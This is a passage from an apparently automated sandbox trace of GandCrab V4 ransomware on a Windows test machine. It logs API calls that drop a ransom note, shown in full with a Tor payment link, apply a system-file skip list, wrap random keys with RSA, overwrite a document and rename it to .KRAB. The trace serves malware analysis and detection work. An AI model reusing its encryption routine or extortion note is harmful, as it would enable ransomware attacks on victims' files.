(lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\") returned 78 [0059.283] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\*" [0059.283] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\*", lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 0xfbd2e0 [0059.283] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0059.283] FindNextFileW (in: hFindFile=0xfbd2e0, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 1 [0059.283] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0059.283] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0059.283] FindNextFileW (in: hFindFile=0xfbd2e0, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 1 [0059.283] lstrcmpW (lpString1="16", lpString2=".") returned 1 [0059.283] lstrcmpW (lpString1="16", lpString2="..") returned 1 [0059.283] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\", lpString2="16" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16" [0059.283] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\" [0059.283] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2ea0000 [0059.284] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0059.284] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0059.284] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0059.284] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0059.284] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.284] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0059.284] wsprintfW (in: param_1=0x2ea0200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\\\KRAB-DECRYPT.txt") returned 98 [0059.285] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\document building blocks\\1033\\16\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x448 [0059.286] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0059.286] WriteFile (in: hFile=0x448, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338e5a0, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338e5a0*=0x1f6e, lpOverlapped=0x0) returned 1 [0059.287] CloseHandle (hObject=0x448) returned 1 [0059.287] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.288] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0059.288] GetSystemTime (in: lpSystemTime=0x2ea0400 | out: lpSystemTime=0x2ea0400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x6, wMilliseconds=0x1ed)) [0059.288] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0059.288] GetWindowsDirectoryW (in: lpBuffer=0x2f30000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0059.288] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f30200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f30600, lpMaximumComponentLength=0x2f30608, lpFileSystemFlags=0x2f30604, lpFileSystemNameBuffer=0x2f30400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f30600*=0xd2ca4def, lpMaximumComponentLength=0x2f30608*=0xff, lpFileSystemFlags=0x2f30604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0059.289] wsprintfW (in: param_1=0x2ea0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\d2ca4a08d2ca4dee3d.lock") returned 104 [0059.289] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\document building blocks\\1033\\16\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x448 [0059.290] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.291] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.291] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\") returned 81 [0059.291] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\*" [0059.291] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\*", lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 0xfbd8a0 [0059.291] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0059.291] FindNextFileW (in: hFindFile=0xfbd8a0, lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 1 [0059.291] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0059.291] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0059.291] FindNextFileW (in: hFindFile=0xfbd8a0, lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 1 [0059.291] lstrcmpW (lpString1="Built-In Building Blocks.dotx", lpString2=".") returned 1 [0059.291] lstrcmpW (lpString1="Built-In Building Blocks.dotx", lpString2="..") returned 1 [0059.291] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\", lpString2="Built-In Building Blocks.dotx" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\Built-In Building Blocks.dotx") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\Built-In Building Blocks.dotx" [0059.292] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0059.292] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\Built-In Building Blocks.dotx.KRAB") returned 115 [0059.292] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\Built-In Building Blocks.dotx") returned 110 [0059.292] lstrlenW (lpString=".dotx") returned 5 [0059.292] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0059.292] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".dotx ") returned 6 [0059.292] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.293] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\Built-In Building Blocks.dotx") returned 110 [0059.293] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\Built-In Building Blocks.dotx") returned 110 [0059.293] lstrcmpiW (lpString1="Built-In Building Blocks.dotx", lpString2="desktop.ini") returned -1 [0059.293] lstrcmpiW (lpString1="Built-In Building Blocks.dotx", lpString2="autorun.inf") returned 1 [0059.293] lstrcmpiW (lpString1="Built-In Building Blocks.dotx", lpString2="ntuser.dat") returned -1 [0059.293] lstrcmpiW (lpString1="Built-In Building Blocks.dotx", lpString2="iconcache.db") returned -1 [0059.293] lstrcmpiW (lpString1="Built-In Building Blocks.dotx", lpString2="bootsect.bak") returned 1 [0059.293] lstrcmpiW (lpString1="Built-In Building Blocks.dotx", lpString2="boot.ini") returned 1 [0059.293] lstrcmpiW (lpString1="Built-In Building Blocks.dotx", lpString2="ntuser.dat.log") returned -1 [0059.293] lstrcmpiW (lpString1="Built-In Building Blocks.dotx", lpString2="thumbs.db") returned -1 [0059.293] lstrcmpiW (lpString1="Built-In Building Blocks.dotx", lpString2="KRAB-DECRYPT.html") returned -1 [0059.293] lstrcmpiW (lpString1="Built-In Building Blocks.dotx", lpString2="KRAB-DECRYPT.txt") returned -1 [0059.293] lstrcmpiW (lpString1="Built-In Building Blocks.dotx", lpString2="CRAB-DECRYPT.txt") returned -1 [0059.293] lstrcmpiW (lpString1="Built-In Building Blocks.dotx", lpString2="ntldr") returned -1 [0059.293] lstrcmpiW (lpString1="Built-In Building Blocks.dotx", lpString2="NTDETECT.COM") returned -1 [0059.293] lstrcmpiW (lpString1="Built-In Building Blocks.dotx", lpString2="Bootfont.bin") returned 1 [0059.293] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0059.293] CryptAcquireContextW (in: phProv=0x338e4b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4b4*=0xfbb220) returned 1 [0059.294] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2f40000 [0059.294] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0059.295] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0059.295] CryptGenRandom (in: hProv=0xfbb220, dwLen=0x20, pbBuffer=0x338e54c | out: pbBuffer=0x338e54c) returned 1 [0059.295] CryptReleaseContext (hProv=0xfbb220, dwFlags=0x0) returned 1 [0059.295] VirtualFree (lpAddress=0x2f40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.295] CryptAcquireContextW (in: phProv=0x338e4b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4b4*=0xfbb4c8) returned 1 [0059.295] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2f40000 [0059.296] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0059.296] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0059.296] CryptGenRandom (in: hProv=0xfbb4c8, dwLen=0x8, pbBuffer=0x338e56c | out: pbBuffer=0x338e56c) returned 1 [0059.296] CryptReleaseContext (hProv=0xfbb4c8, dwFlags=0x0) returned 1 [0059.296] VirtualFree (lpAddress=0x2f40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.296] CryptAcquireContextW (in: phProv=0x338e4ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4ac*=0xfbb4c8) returned 1 [0059.297] CryptImportKey (in: hProv=0xfbb4c8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e4b0 | out: phKey=0x338e4b0*=0xfbd260) returned 1 [0059.297] CryptGetKeyParam (in: hKey=0xfbd260, dwParam=0x8, pbData=0x338e4a4, pdwDataLen=0x338e4a8, dwFlags=0x0 | out: pbData=0x338e4a4*=0x800, pdwDataLen=0x338e4a8*=0x4) returned 1 [0059.297] CryptEncrypt (in: hKey=0xfbd260, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30000*, pdwDataLen=0x338e4dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30000*, pdwDataLen=0x338e4dc*=0x100) returned 1 [0059.297] GetLastError () returned 0x0 [0059.297] CryptDestroyKey (hKey=0xfbd260) returned 1 [0059.297] CryptReleaseContext (hProv=0xfbb4c8, dwFlags=0x0) returned 1 [0059.298] CryptAcquireContextW (in: phProv=0x338e4ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4ac*=0xfbbdd0) returned 1 [0059.298] CryptImportKey (in: hProv=0xfbbdd0, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e4b0 | out: phKey=0x338e4b0*=0xfbd320) returned 1 [0059.298] CryptGetKeyParam (in: hKey=0xfbd320, dwParam=0x8, pbData=0x338e4a4, pdwDataLen=0x338e4a8, dwFlags=0x0 | out: pbData=0x338e4a4*=0x800, pdwDataLen=0x338e4a8*=0x4) returned 1 [0059.298] CryptEncrypt (in: hKey=0xfbd320, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30100*, pdwDataLen=0x338e4dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30100*, pdwDataLen=0x338e4dc*=0x100) returned 1 [0059.298] GetLastError () returned 0x0 [0059.298] CryptDestroyKey (hKey=0xfbd320) returned 1 [0059.299] CryptReleaseContext (hProv=0xfbbdd0, dwFlags=0x0) returned 1 [0059.299] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\Built-In Building Blocks.dotx" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\document building blocks\\1033\\16\\built-in building blocks.dotx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x450 [0059.301] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x35e0000 [0059.302] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0059.302] ReadFile (in: hFile=0x450, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338e57c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338e57c*=0x100000, lpOverlapped=0x0) returned 1 [0059.378] SetFilePointerEx (in: hFile=0x450, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0059.378] WriteFile (in: hFile=0x450, lpBuffer=0x3870000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338e578, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesWritten=0x338e578*=0x100000, lpOverlapped=0x0) returned 1 [0059.381] ReadFile (in: hFile=0x450, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338e57c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338e57c*=0x100000, lpOverlapped=0x0) returned 1 [0059.408] SetFilePointerEx (in: hFile=0x450, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0059.408] WriteFile (in: hFile=0x450, lpBuffer=0x3870000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338e578, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesWritten=0x338e578*=0x100000, lpOverlapped=0x0) returned 1 [0059.411] ReadFile (in: hFile=0x450, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338e57c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338e57c*=0x100000, lpOverlapped=0x0) returned 1 [0059.430] SetFilePointerEx (in: hFile=0x450, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0059.430] WriteFile (in: hFile=0x450, lpBuffer=0x3870000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338e578, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesWritten=0x338e578*=0x100000, lpOverlapped=0x0) returned 1 [0059.432] ReadFile (in: hFile=0x450, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338e57c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338e57c*=0x88cc7, lpOverlapped=0x0) returned 1 [0059.447] SetFilePointerEx (in: hFile=0x450, liDistanceToMove=0xfff77339, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0059.447] WriteFile (in: hFile=0x450, lpBuffer=0x3870000*, nNumberOfBytesToWrite=0x88cc7, lpNumberOfBytesWritten=0x338e578, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesWritten=0x338e578*=0x88cc7, lpOverlapped=0x0) returned 1 [0059.448] WriteFile (in: hFile=0x450, lpBuffer=0x2f30000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338e578, lpOverlapped=0x0 | out: lpBuffer=0x2f30000*, lpNumberOfBytesWritten=0x338e578*=0x208, lpOverlapped=0x0) returned 1 [0059.448] VirtualFree (lpAddress=0x35e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.452] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.456] CloseHandle (hObject=0x450) returned 1 [0059.684] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.684] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\Built-In Building Blocks.dotx" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\document building blocks\\1033\\16\\built-in building blocks.dotx"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\Built-In Building Blocks.dotx.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\document building blocks\\1033\\16\\built-in building blocks.dotx.krab")) returned 1 [0059.685] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.685] FindNextFileW (in: hFindFile=0xfbd8a0, lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 1 [0059.685] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0059.685] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0059.686] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\d2ca4a08d2ca4dee3d.lock" [0059.686] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0059.686] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 109 [0059.686] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\d2ca4a08d2ca4dee3d.lock") returned 104 [0059.686] lstrlenW (lpString=".lock") returned 5 [0059.686] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0059.686] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".lock ") returned 6 [0059.686] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.687] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.687] FindNextFileW (in: hFindFile=0xfbd8a0, lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 1 [0059.687] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 